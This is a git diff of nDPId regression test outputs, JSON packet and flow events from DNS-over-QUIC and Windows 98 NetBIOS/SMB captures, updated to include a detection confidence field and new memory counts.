 00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"doq_adguard.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1608278425043,"flow_last_seen":1608278425043,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1608278425043,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1608278425043,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1274,"pkt_l4_len":1240,"ts_msec":1608278425043,"pkt":"CL6sCxdumt9Y+uvcCABFAATsXYdAAEARno7AqAypXowODqBuAxAE2E0Zwf8AAB0S1uV91ARNGaKcpPbuz4JRKRijEV3+fOp1xbl+o2VPCxw5C7F1AESjjIExuU1VGYMi3qR5FgZXmV5jW\/GS3bvPGESTCXlAOuaNPS4Z9rqb5GmZjOPu5h+dEeHCBQsH0bRQhppRcffIYyvfvxi5LNyq540e1YcNLgxwEYv9mwEEutsUSgLF8qQi1vATlbVLiQwhaXITCRD653klYnm9BoO04fUR8kaaf1qYfex026282Q5EvztDSyWuA6xW\/3D3I27VAQo2GbCoqYf0QIrZOfacQartZRA3xvw5C0Iz0S7jBboiOrSPOxbet7b4p4CBzdW+POAUSVXQZZS3xQkY5PXEeYGco5aUsp3O0lAaLfFFVll\/srPVtdJxYLG5mlTKam3NxBl9gHT9gkoJzUoEmtdaRDaxhP5yiedQs+JgoW4F1fDqHPMPnBtk1UezjBjE\/COENcHIEQq2HIfbQ9Lv+kS5CfcaSKs2mUQTuvs7\/voDRF2y7TFb+uqyMeAqq3doSDMB2jHa\/EojP\/f+RrMNy\/X7kDEEcbw43eMXD1tzHjBj\/ncaLMsfP3IPyZyF35MF8e+053ploy3mGcl5fW5eZxUFM6FDjn\/9\/9yB7HR5pdMyplGzzI1OpdByhfvbVWjVUlFgtm4LcbCFS9YXIuJWVQaT92LVmTrycmBpec\/NHPi6MerrZrFPH1cWAKJm6C\/35hd09a7vURbcj2Nwu+wvQEGek3M9LNpTgKAxfeLa6jR7yY8FRi9Fslx+40aTEwGgLY10PqSAVV873bY1HrjXgee+hInU5OzwDGisUkG1vjenUqCdXtWODZ9xJFrjxkNSBVsfWyX84bL4AH0cHSMH3bXpv8DZGk6dvuB1thnl5dRd79ArhxOkLRjIKU\/spE2xAqe+laOg7FDuovO8+vb44+p0a1tCIq75DbW5Z\/3eQHDpNFbf\/ZruNBwv0I6n5NxcgHEUQaffXIlX36W8Z8AD3YDD85hA4jZxmySge94o03q\/ZMGs+bJTnaK8KlLmSNMXuFjJ7F4SdWbAr+gE3KQqFqqYY9ZfiG2QbB9\/YTG+8SQBafYwX6k2J2OEpMyUilzmDTz3a5eH47iPLgq2nb2F+k0c4RMx6bB8xhJbOXMxEbB5OktMbojYZ5\/D7JZ6FArciEMMkyFIwplniDv\/bjNCRjIZzGWltVCRAQBZZf0ds2kXzLEOIGMUpx2oFRtwDgwesKJgy9be1woTT3HVmrfv8vUkkFOD253UN9bBIfIU4elVEm8DEZ93RQ8PGCnqpWPqKVclryY+VrRX6bBv\/eydiZowniNJyXmSTkGKfOGX30rdpMaFIjV9VAFWlq4kC1zIbyb3K46JC+I+XxrKEmMLqMbO6CesmtgLUC8vVTv7LWODOF1NIRzdEgb8Qn\/9qSY3t6c\/zKgfF8YyVeS6jf5EL3te6RDnB0wZsaBklSDaR66VSY+qB2O5PnaefdIKM\/htIG2nKmWB0tq+\/dxdUHWEvheHhEbmX4TUB3cfXIIesE+zpUW6KXqwY94WHHPEMe6voxs49AJ\/2IZiFohwbn6CjrWd2PilA\/\/N7kVyw58ilFGWokoGNIRgJ61vUDU8rgEdxFK12mR1bebXKhOpf+Sf7ekcBE2R4BLb6ThrQxQ="}
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1608278425043,"flow_last_seen":1608278425043,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1608278425043,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","ndpi": {"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.adguard.com","version":"TLSv1.3","alpn":"doq-i00","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}}
+00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1608278425043,"flow_last_seen":1608278425043,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1608278425043,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.adguard.com","version":"TLSv1.3","alpn":"doq-i00","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}}
 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1608278425079,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"ts_msec":1608278425079,"pkt":"mt9Y+uvcCL6sCxduCABFAACoAbMAAD8RP6dejA4OwKgMqQMQoG4AlJ+l8P8AAB0RXf586nXFuX6jZU8LHDkLsXUEXOoexyg1M1\/+GZvbsGeGqJJILJUnaeRPlfaewSkJ0QM1kILJB9RkVGFQIKTOYfD\/amFvF5G2sUWGCAnPMQAxGtra+t44CL4uNVFuP1UAIYDjP5flgPs8Cfp53+s66ugMjRy2XoqR7aApyqmdoc3EHdt+2Cg="}
 02107{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1608278425084,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1274,"pkt_l4_len":1240,"ts_msec":1608278425084,"pkt":"CL6sCxdumt9Y+uvcCABFAATsXYtAAEARnorAqAypXowODqBuAxAE2FXxz\/8AAB0EXOoexxFd\/nzqdcW5fqNlTwscOQuxdUBgKDUzX\/4Zm9uwZ4aokkgslSdp5E+V9p7BKQnRAzWQgskH1GRUYVAgpM5h8P9qYW8XkbaxRYYICc8xADEa2tr63jgIvi41UW4\/VQAhgOM\/l+WA+zwJ+nnf6zrq6AyNHLZeRFASnCr8obwp9Ty5sR7kprQnC0Sv2ZcsxYzIMAthEKqYU0zMuGSEznU2JvTrq\/bykaeb5dqdGxdiszDYKDU6Jn7sPAcjUZ2gh8+BYZGe9phFiloXFkZRqkF4syIAEkOpcy2MK\/fkeUIOyP6wlwkzaY3fbmuxHrqRyLu45SBR1VMQFyHi28JYz7QmMQfDMqnuI0IWIuFKHwG0T\/v0jhF19jPBzG3JSCrPoiaSUV9rQI1kZsCKoMrGjumM68QAfolXONsAd2IYudReWz3mQrB3zOSDXc7+iPJJwc0+KS52obxIkJ0I8SZ7CLjp+FpGH++2YepZGSZYPB5rc\/4HU1bQ4ocmPERQ5l+FpQxpj4cq2AJTX05VWg9LfjDFrHE6D6oMOTTfheRhy7X3SqhzfVhy\/w3RXnv00qwNGkVr8QIR+wCM95sfw88fV3+NqmU3vnLU2z+qvvT2HlvRQm9ykjYa60lgB9sFJ5Ng9ge\/cpn16AR4r\/NoOup4fo8EeFB8cFrAVg+3WG3mgWxUdvK6oND07fFN48QrriL1y7XuIB3Fa65jgY5B4zE7vkkBXKUfGormP9hug8dHVr44WkbHCTqfFJuTHKIf9gtfJ9VQps1jhQjM952WGdM\/mFbut40pSDwrgQgdt0stO2C4PvDiwgzZaEybJzcZBHCUgM8reKIoRyLrSsWciN2b3tsFQXXaEeEGdt8Bc\/5zyh11uwNSzGQ\/Fl2k7QrJleMEWlDCFHuNFZdb7JDVOvqjlXAHTTHX0xSx0KU4aqrg\/kZVORXUFVlv\/xu8mW\/pGVbnSUQNAvLvkvHNdnu1ZPxtBzMoqU+96Xp\/DxrznNbYv32YFRLbK8kA8U4FaZhJ3oS+5KFBikdLEV9Hai2hbk8GZjN2iqviHrHccJqNkg3SIuZD5qamhaUaMG9NOa5pQ9jLJU\/ymgo7DdgKxRH8uuDjWk10CemOYV7pIj9XJEg0HHMmlI1Un6aDxtAu5UK1qm1HNb38yVa+sYeN5Ew6KHyqBUxxS4IflHX5qeqIZPOKrYg5MCubhSudLKbjcH5sXIzejKF8iZ0FlTKPdHSExxjW0QFN6bAWoLJuZE\/4kDcgHKTjdquB1S9wjg6Pah9A0AO1p8+A56ZYLVjRHdUF0Eo6bHTdn4hIgHvxPjCmO5BtWUKEeQnKGkkR8kgREjXo6GfEeHC4Vb4SCK88RJFW07bR+3U68E0sOKimZElroA+KMcE32OqnpsNULoyV7BunASAegp78gVNI0Bil4Klffm6tM6xnJr7Wx08jSGi+pGYWmiGnj3zfHIxpQuw4bIpm3S\/lud8tMnqwiD6\/bIUKO1SxVSWZBp6s2PlGyGHrgwwdIy5nXoip9OukmbhVHpu5a+3BERo9ToRhkKbGsS5gAuyL08\/F6VvMQD\/JdB+\/2rkXCT7ca7Lr49P5aV+w66D8Iwyn8BcCGyOLiGucN4S\/JjMhOeFgH9mu48hQ78o="}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":296,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":296,"flow_first_seen":1608278425043,"flow_last_seen":1608278463119,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":32013,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1608278463119,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":296,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":296,"flow_first_seen":1608278425043,"flow_last_seen":1608278463119,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":32013,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1608278463119,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}}
 00162{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":296,"source":"doq_adguard.pcapng","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 296/296
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4608817 bytes
-~~ total memory freed........: 4608817 bytes
-~~ total allocations/frees...: 99861/99861
+~~ total memory allocated....: 4693770 bytes
+~~ total memory freed........: 4693770 bytes
+~~ total allocations/frees...: 101451/101451
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 167 chars
 ~~ json string max len.......: 2113 chars
diff --git a/test/results/dos_win98_smb_netbeui.pcap.out b/test/results/dos_win98_smb_netbeui.pcap.out
index e9a18db20..653966677 100644
--- a/test/results/dos_win98_smb_netbeui.pcap.out
+++ b/test/results/dos_win98_smb_netbeui.pcap.out
@@ -17,12 +17,12 @@
 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":8,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576409797553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1576409797553,"pkt":"AFBW6YlWAFBWM3ieCABFAABgBwAAAIAR07fAqO+BwKjvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409797553,"flow_last_seen":1576409797553,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409797553,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1576409797553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1576409797553,"pkt":"AFBW6YlWAFBWM3ieCABFAABgCAAAAIAR0rfAqO+BwKjvAgCJAIkATHy8AAIpAAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAMCo74E="}
 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1576409797554,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1576409797554,"pkt":"AFBW6YlWAFBWM3ieCABFAABgCQAAAIAR0bfAqO+BwKjvAgCJAIkATA7DAAgpAAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAMCo74E="}
 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576409798047,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":8,"ts_msec":1576409798047,"pkt":"AQBeAAACAFBWM3ieCABFAAAcCwAAAIABn7TAqO+B4AAAAgoA9f8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00583{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
 00374{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"ts_msec":1576409798642,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="}
 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47}
 00374{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":19,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"ts_msec":1576409799428,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="}
@@ -31,14 +31,14 @@
 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":20,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576409800543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1576409800543,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEAAAAIARybrAqO+BwKjv\/wCJAIkATAq6AAQpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1576409800544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEQAAAIARyLrAqO+BwKjv\/wCJAIkATHuvAAIpEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAMCo74E="}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1576409800544,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEgAAAIARx7rAqO+BwKjv\/wCJAIkATA22AAgpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAMCo74E="}
 00532{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"ts_msec":1576409802223,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"}
 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576409807597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1576409807597,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADlJAAAAIARtTXAqO+BwKjv\/wCKAIoA0Qn+EQIADMCo74EAigC7AAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"}
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
